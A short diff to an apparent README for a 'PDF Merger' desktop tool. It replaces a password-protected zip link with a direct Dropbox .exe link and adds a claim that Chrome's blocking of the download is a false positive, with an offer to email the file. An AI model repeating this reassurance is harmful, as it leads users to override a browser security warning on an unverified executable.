davidjeong/pdf-merger/README.md

 * Automatic file opening upon task completion.

-The self-contained installer executable could be found [here](https://www.dropbox.com/s/x2tds5heq47vsuu/PDF%20Merger-1.0.1.zip?dl=0).
+The self-contained installer executable could be found [here](https://www.dropbox.com/s/sgv29oydtnkhff2/PDF%20Merger-1.0.1.exe?dl=0).
 ```
-You need to unzip the file using the password: pdf123.
+There is a minor problem where chrome automatically blocks the file upon downloading, this is a false positive.
+If you want, you can email me at djeong747@gmail.com and I will email you the file.